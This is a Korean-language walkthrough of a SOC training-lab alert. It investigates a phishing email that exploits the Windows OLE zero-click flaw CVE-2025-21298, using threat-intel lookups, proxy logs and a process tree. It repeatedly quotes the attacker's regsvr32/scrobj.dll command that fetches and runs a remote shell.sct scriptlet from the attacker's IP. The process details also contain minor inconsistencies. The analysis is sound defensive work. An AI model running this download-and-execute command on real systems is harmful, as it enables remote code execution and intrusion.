
SOC336 - Windows OLE 제로클릭 RCE 악용 탐지 (CVE-2025-21298) 워크스루
(맨 위로)
직원 중 한 명인 Austin이 의심스러운 발신자로부터 피싱 이메일을 받았고, 그가 Outlook에서 이메일을 연 후 2025년 2월 4일 오후 4:18에 경고가 트리거되었습니다. 트리거 사유는 "알려진 CVE-2025-21298 악용 패턴이 식별된 악성 RTF 첨부 파일" 이었습니다.
(맨 위로)
EventID : 314
이벤트 시간 : 2025년 2월 4일 오후 4:18 (잘못된 것 같습니다)
규칙 : SOC336 - Windows OLE 제로 클릭 RCE 악용 탐지 (CVE-2025-21298)
등급 : 보안 분석가
SMTP 주소 : 84.38.130.118
출발지 주소 : [email protected]
목적지 주소 : [email protected]
이메일 제목 : Important: Action Required for Upcoming Project Deadline
첨부 파일 : mail.rtf
첨부 파일 해시 : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
장치 조치 : 허용됨
트리거 사유 : 알려진 CVE-2025-21298 악용 패턴이 식별된 악성 RTF 첨부 파일.
(맨 위로)
경고 트라이지를 위해 이메일 보안, 로그 관리 및 엔드포인트 보안 로그를 자세히 살펴보겠습니다.
발신자 주소인 projectmanagement@pm[.]me를 검색하고 같은 날 오전 5:12에 보낸 "Important: Action Required for Upcoming Project Deadline" 이메일을 클릭했습니다. "Important" 및 "Action Required"와 같은 긴급한 어조와 표현 때문에 피싱 이메일이라는 점을 알 수 있었습니다.
VirusTotal에서 pm[.]me 도메인을 검색했고 오직 1개의 벤더만 의심스럽다고 판단했습니다.
그러나 SMTP 주소 84[.]38[.]130[.]118을 검색했을 때 7개의 벤더가 이를 악성 및 멀웨어로 플래그했으며 SILVER C2 서버와 관련이 있었습니다.
84[.]38[.]130[.]118은 AbuseIPDB 데이터베이스에서도 발견되었습니다. 이 IP는 라트비아 리가(Riga)에 위치하며 rixhost.lv 도메인에 속하고 DDoS 공격, 해킹 및 악용된 호스트로 분류됩니다.
마지막으로 첨부 파일 mail.rtf의 해시 df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184를 VirusTotal에서 검색했고 61개 벤더 중 29개가 첨부 파일을 악성으로 플래그했습니다. 이 파일은 rtfmalformb 멀웨어 계열에 속하며 CVE-2025-21298 취약점과 연관되어 있습니다.
악성 첨부 파일이 포함된 피싱 이메일이 Austin에게 전송된 것이 확인되었습니다.
(맨 위로)
Austin이 피싱 이메일을 연 오전 5:12 이후 의심스러운 활동이 있었는지 조사해 보겠습니다.
먼저 프록시 로그를 확인하고 발신자의 악성 IP 주소 84[.]38[.]130[.]118을 검색했습니다. 오전 8:06에 cmd.exe에 의해 시작된 HTTP GET 요청이 악성 IP 주소로 hxxp://84[.]38[.]130[.]118/shell[.]sct URL에 전송되어 Windows 스크립틀릿 파일을 다운로드한 것을 발견했습니다. 응답 코드는 200 OK였으며, 이는 아웃바운드 트래픽이 허용되었고 방화벽에 의해 차단되지 않았음을 나타냅니다. 역방향 셸 스크립트를 포함할 가능성이 있는 스크립트 파일이 수신된 것은 비정상적이었습니다.
(맨 위로)
악성 IP 주소로의 아웃바운드 트래픽이 cmd.exe에 의해 시작되었기 때문에 먼저 터미널 기록을 확인했습니다. 오전 8:06:08에 "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" 명령이 실행되어 scrobj.dll이 악성 IP 주소에서 스크립트 파일을 가져오기 위해 regsvr32.exe를 실행한 것을 발견했습니다.
Windows의 기본 제공 유틸리티를 사용하여 스크립트를 가져오면 시스템에 남는 흔적이 최소화되어 리버스 엔지니어링과 멀웨어 분석 과정이 더 어려워질 수 있습니다!
(맨 위로)
명령 실행 이벤트 이후인 오전 8:06:42에 악성 IP 84[.]38[.]130[.]118로의 연결이 있었던 것이 확인되었습니다.
(맨 위로)
그렇다면 이메일을 클릭만 했는데 왜 cmd.exe가 실행되었을까요? Austin이 악성 첨부 파일 mail.rtf를 다운로드했다는 증거는 발견되지 않았지만, 엔드포인트 로그를 확인하고 오전 8:06 근처의 이벤트를 검색했습니다.
프로세스 ID: 7023
이벤트 시간: 2025년 2월 4일 오전 8:06:25
명령줄: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
부모 프로세스: cmd.exe
그럼 부모 프로세스인 cmd.exe를 살펴보겠습니다.
프로세스 ID: 6784
이벤트 시간: 2025년 2월 4일 오전 8:06:08
명령줄: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
부모 프로세스: outlook.exe
마지막으로 outlook.exe의 부모 프로세스도 확인했습니다.
프로세스 ID: 4820
이벤트 시간: 2025년 2월 4일 오전 8:05:15
명령줄: "C:\Windows\System32\cmd.exe"
부모 프로세스: explorer.exe
따라서 악성 프로세스는 다음과 같은 트리로 정리할 수 있습니다:
explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! 스크립트 실행 !
그러나 CVE-2025-21298에 대한 정보를 찾기 전까지는 악성 첨부 파일을 다운로드하거나 열지 않았는데도 어떻게 악성 프로세스가 시작되었는지, 그리고 어떻게 outlook.exe가 악성 프로세스를 생성했는지 여전히 의문이었습니다.
(맨 위로)
Offsec의 기사에 따르면, 2025년 1월에 이메일을 통한 RCE를 가능하게 하는 CVSS 점수 9.8의 심각한 Windows OLE 제로 클릭 취약점이 있었습니다. 대상 수신자가 Microsoft Outlook에서 악성 이메일(악성 스크립트가 포함된 RTF 문서 포함)을 열거나 미리 보기만 해도 취약점이 트리거되어 공격자가 영향을 받는 시스템에서 임의 코드를 실행할 수 있습니다.
Windows OLE와 RTF 문서의 하이재킹 프로세스에 대해 Google과 Gemini에서 조사했고, 제가 알고 있는 리버스 엔지니어링 지식과 관련지어 보았습니다:
(맨 위로)
격리되지 않음
악성
액세스됨
(맨 위로)
분류: 심각(Critical)
유형: 멀웨어
활동 시간:
2025년 2월 4일 오전 5:12 (피싱 이메일 수신)
2025년 2월 4일 오전 8:05:15 - 2025년 2월 4일 오전 8:06:42 (피싱 이메일 열림 및 악성 코드 실행)
영향받은 개체:
출발지 주소: projectmanagement@pm[.]me
SMTP 주소: 84[.]38[.]130[.]118
수신자 이메일 주소: Austin@letsdefend[.]io
수신자 IP 주소: 172[.]16[.]17[.]137
호스트명: Austin
True positive 판정 사유:
2025년 2월 4일 오전 5:12에 "Important: Action Required for Upcoming Project Deadline"이라는 제목의 의심스러운 이메일이 [email protected](IP 주소: 84.38.130.118)에서 [email protected](IP 주소: 172.16.17.137)로 첨부 파일 mail.rtf(SHA256 해시: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184)와 함께 전송되었습니다. 제목에 사용된 긴급한 어조와 표현은 피싱 이메일임을 시사했습니다. Threat Intel인 VirusTotal과 AbuseIPDB는 라트비아 리가(Riga)에 위치하고 rixhost.lv 도메인에 속하는 발신자의 IP 주소와 첨부 파일을 악성 및 멀웨어로 플래그했습니다.
프록시 로그에 따르면, 오전 8:06에 cmd.exe에 의해 시작된 HTTP GET 요청이 악성 IP 주소로 hxxp://84[.]38[.]130[.]118/shell[.]sct URL에 전송되어 Windows 스크립틀릿 파일을 다운로드했습니다. 응답 코드는 200 OK였으며, 이는 악성 IP 주소로의 아웃바운드 트래픽이 허용되었고 방화벽에 의해 차단되지 않았음을 나타냅니다.
엔드포인트 보안 로그에 따르면, 악성 코드 "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"(PID: 7023)은 outlook.exe(PID: 4820)에서 생성된 cmd.exe(PID: 6784)에 의해 실행되었습니다.
이 악용은 2025년 1월에 이메일을 통한 RCE를 가능하게 하는 CVSS 점수 9.8의 심각한 Windows OLE 제로 클릭 취약점(CVE-2025-21298)으로 인해 발생했습니다. 대상 수신자가 Microsoft Outlook에서 악성 스크립트가 포함된 유해한 RTF 문서가 포함된 악성 이메일을 열거나 미리 보기만 해도 취약점이 트리거되어 공격자가 영향받는 시스템에서 임의 코드를 실행하고 잠재적으로 C2 서버에 역방향 셸을 구축할 수 있습니다.
에스컬레이션 사유:
활성화된 사후 악용 C2 네트워크 트래픽이 아직 명확하게 관찰되지는 않았지만, 엔드포인트 보안 로그에서 scrobj.dll을 사용하는 regsvr32.exe가 스크립틀릿 파일 shell.sct를 가져오는 실행을 확인했습니다. CVE-2025-21298의 CVSS 점수가 9.8이므로 호스트에서 지속성 또는 데이터 유출과 같은 의심스러운 활동이 있는지 추가 조사가 필요합니다.
수정 조치:
침해 지표:
(맨 위로)
CVE-2025-21298: 심각한 Windows OLE 제로클릭 취약점
(맨 위로)